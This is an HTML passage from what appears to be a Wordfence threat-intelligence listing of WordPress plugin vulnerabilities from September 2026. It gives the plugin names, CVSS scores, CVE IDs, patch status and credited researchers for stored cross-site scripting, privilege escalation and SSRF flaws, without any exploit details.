<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/osman" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/4e29654daa4a2049cec375b97c8ef638.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="4e29654daa4a2049cec375b97c8ef638"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/osman" target="_blank" rel="noopener">Osman Hussein</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d82f5ffb-3499-462b-a04e-37e33ddf05c9" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/82d408f2-9d72-465e-aa3d-eca4dab2af60" target="_blank" rel="noopener">SEO Flow by LupsOnline 3.0.0 &#8211; 3.0.2 &#8211; Unauthenticated Privilege Escalation</a></h4>
<div class="cvss-score-badge">7.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.3 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78362" target="_blank" rel="noopener noreferrer">							CVE-2026-78362						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/lupsonline-link-netwerk" target="_blank" rel="noopener">SEO Flow by LupsOnline</a> <span class="wfvr-software-slug">[lupsonline-link-netwerk]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/naoki-kawahigashi" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e126a9af211881ed6f11a71a84286fbe.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e126a9af211881ed6f11a71a84286fbe"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/naoki-kawahigashi" target="_blank" rel="noopener">Naoki Kawahigashi</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/82d408f2-9d72-465e-aa3d-eca4dab2af60" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/60e8b120-b9ba-4f56-b47b-b06cf188febc" target="_blank" rel="noopener">SiteSkite MCP AI – Connector for Claude, ChatGPT, Cursor &amp; WordPress WebOps &lt;= 2.1.5 &#8211; Unauthenticated Privilege Escalation</a></h4>
<div class="cvss-score-badge">7.3</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.3 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81805" target="_blank" rel="noopener noreferrer">							CVE-2026-81805						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 9, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/siteskite" target="_blank" rel="noopener">SiteSkite MCP AI – Connector for Claude, ChatGPT, Cursor &amp; WordPress WebOps</a> <span class="wfvr-software-slug">[siteskite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/60e8b120-b9ba-4f56-b47b-b06cf188febc" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/838dd2f9-22e3-4833-9f55-09bd729fd6ed" target="_blank" rel="noopener">Contact Form to DB by BestWebSoft &lt;= 1.7.5 &#8211; Unauthenticated Stored Cross-Site Scripting via cntctfrm_contact_dropdown Parameter</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13359" target="_blank" rel="noopener noreferrer">							CVE-2026-13359						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/contact-form-to-db" target="_blank" rel="noopener">Contact Form to DB by BestWebSoft – Messages Database Plugin For WordPress</a> <span class="wfvr-software-slug">[contact-form-to-db]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/86a1429aeb8e473ec62cf8dd3d4e4571.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="86a1429aeb8e473ec62cf8dd3d4e4571"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nabil-irawan" target="_blank" rel="noopener">Nabil Irawan</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/838dd2f9-22e3-4833-9f55-09bd729fd6ed" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6045c4fd-60ed-4771-93f4-d4df41ef888b" target="_blank" rel="noopener">Cookie Banner for GDPR / CCPA &lt;= 4.4.1 &#8211; Unauthenticated Stored Cross-Site Scripting via &#8216;wpl_user_preference&#8217; Parameter</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14989" target="_blank" rel="noopener noreferrer">							CVE-2026-14989						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gdpr-cookie-consent" target="_blank" rel="noopener">WPLP Cookie Consent – Cookie Banner &amp; Consent Management for GDPR, CCPA &amp; Google Consent Mode</a> <span class="wfvr-software-slug">[gdpr-cookie-consent]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/n4kk0" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/30be710f698d639149a73105e793c201.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="30be710f698d639149a73105e793c201"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/n4kk0" target="_blank" rel="noopener">Naoya Takahashi (nakko)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6045c4fd-60ed-4771-93f4-d4df41ef888b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1d064a64-3dee-4930-af87-21c9af3d1d1e" target="_blank" rel="noopener">Easy Appointments &lt;= 4.0.2.1 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81798" target="_blank" rel="noopener noreferrer">							CVE-2026-81798						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-appointments" target="_blank" rel="noopener">Easy Appointments</a> <span class="wfvr-software-slug">[easy-appointments]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/0xzenko" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/0xzenko" target="_blank" rel="noopener">0xzenko</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1d064a64-3dee-4930-af87-21c9af3d1d1e" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7145fe39-cc90-46e4-ae74-b64694d0dc7f" target="_blank" rel="noopener">Gutenverse News – News Blocks for Blog &amp; Magazine Sites &lt; 3.3.3 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-85677" target="_blank" rel="noopener noreferrer">							CVE-2026-85677						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 11, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gutenverse-news" target="_blank" rel="noopener">Gutenverse News – News Blocks for Blog &amp; Magazine Sites</a> <span class="wfvr-software-slug">[gutenverse-news]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/66ac278d7e3fc457bdbe731edc3c5364.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="66ac278d7e3fc457bdbe731edc3c5364"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener">Artus KG</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/7145fe39-cc90-46e4-ae74-b64694d0dc7f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3d4ae328-5aae-435c-af23-b5ffd56bd83a" target="_blank" rel="noopener">Hide My WP Ghost – Security &amp; Firewall &lt;= 7.0.09 &#8211; Unauthenticated Server-Side Request Forgery</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81806" target="_blank" rel="noopener noreferrer">							CVE-2026-81806						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hide-my-wp" target="_blank" rel="noopener">Hide My WP Ghost – Security &amp; Firewall</a> <span class="wfvr-software-slug">[hide-my-wp]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/3d4ae328-5aae-435c-af23-b5ffd56bd83a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a4c604ec-6b91-4dbe-bce0-145851019113" target="_blank" rel="noopener">JetFormBuilder — Dynamic Blocks Form Builder &lt;= 3.6.5.1 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-84817" target="_blank" rel="noopener noreferrer">							CVE-2026-84817						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jetformbuilder" target="_blank" rel="noopener">JetFormBuilder — Dynamic Blocks Form Builder</a> <span class="wfvr-software-slug">[jetformbuilder]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/anthony-green-of-greenhat-security" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/a353e86239973656255a46cde8db60f9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="a353e86239973656255a46cde8db60f9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/anthony-green-of-greenhat-security" target="_blank" rel="noopener">Anthony Green of Greenhat Security</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a4c604ec-6b91-4dbe-bce0-145851019113" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2ae1c18c-5be3-48db-af31-4c88daa549fc" target="_blank" rel="noopener">Jetpack – WP Security, Backup, Speed, &amp; Growth 16.1 &#8211; 16.1.2 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jetpack" target="_blank" rel="noopener">Jetpack – WP Security, Backup, Speed, &amp; Growth</a> <span class="wfvr-software-slug">[jetpack]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jetpack" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/552d5c3af16be37b5afe38403782c049.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="552d5c3af16be37b5afe38403782c049"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jetpack" target="_blank" rel="noopener">Jetpack</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2ae1c18c-5be3-48db-af31-4c88daa549fc" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/49664262-ad86-426e-8f66-9ada61a25bd7" target="_blank" rel="noopener">Kirki – Freeform Page Builder, Website Builder &amp; Customizer 6.2.1 &#8211; 6.2.5 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-84219" target="_blank" rel="noopener noreferrer">							CVE-2026-84219						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kirki" target="_blank" rel="noopener">Kirki – Freeform Page Builder, Website Builder &amp; Customizer</a> <span class="wfvr-software-slug">[kirki]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/d36a048c5f4fe8795a861da6334611fa.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="d36a048c5f4fe8795a861da6334611fa"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jakub-herman" target="_blank" rel="noopener">Jakub Herman</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/49664262-ad86-426e-8f66-9ada61a25bd7" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e578af07-90ec-4bd4-91ec-b793bbccf977" target="_blank" rel="noopener">Kirki &lt;= 6.2.0 &#8211; Unauthenticated Stored Cross-Site Scripting via &#8216;comment&#8217; Parameter</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-17037" target="_blank" rel="noopener noreferrer">							CVE-2026-17037						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 10, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kirki" target="_blank" rel="noopener">Kirki – Freeform Page Builder, Website Builder &amp; Customizer</a> <span class="wfvr-software-slug">[kirki]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/7965cd13376a540548ec7009cd66b05b.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="7965cd13376a540548ec7009cd66b05b"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/daroo-2" target="_blank" rel="noopener">daroo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/e578af07-90ec-4bd4-91ec-b793bbccf977" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0817afa2-ec6f-42cc-89ae-f43c08c2980b" target="_blank" rel="noopener">Open User Map – Interactive Leaflet Maps &lt;= 1.4.50 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-84818" target="_blank" rel="noopener noreferrer">							CVE-2026-84818						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 7, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/open-user-map" target="_blank" rel="noopener">Open User Map – Interactive Leaflet Maps</a> <span class="wfvr-software-slug">[open-user-map]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/care" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e0d316069f277a0a76ff8d9e3c1df612.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e0d316069f277a0a76ff8d9e3c1df612"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/care" target="_blank" rel="noopener">care</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0817afa2-ec6f-42cc-89ae-f43c08c2980b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0f792909-ddfa-4d31-8bbb-1a7e94fb5f0b" target="_blank" rel="noopener">Page Visits Counter – Lite &lt;= 1.2.3 &#8211; Unauthenticated Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-81795" target="_blank" rel="noopener noreferrer">							CVE-2026-81795						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/page-visits-counter-lite" target="_blank" rel="noopener">Page Visits Counter – Lite</a> <span class="wfvr-software-slug">[page-visits-counter-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-khanh" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/429c3eb56bea605e95a57ae93ae24c62.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="429c3eb56bea605e95a57ae93ae24c62"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-khanh" target="_blank" rel="noopener">Nguyen Ba Khanh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0f792909-ddfa-4d31-8bbb-1a7e94fb5f0b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2f35ab5c-f897-404b-92ea-71bf1c98e0c0" target="_blank" rel="noopener">PublishPress Capabilities &lt;= 2.50.0 &#8211; Authenticated (Editor+) Privilege Escalation to Fresh-Install Default Capability Grant</a></h4>
<div class="cvss-score-badge">7.2</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>7.2 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-75927" target="_blank" rel="noopener noreferrer">							CVE-2026-75927						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 8, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/capability-manager-enhanced" target="_blank" rel="noopener">PublishPress Capabilities: User Role Access Control, Admin Area Permissions</a> <span class="wfvr-software-slug">[capability-manager-enhanced]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
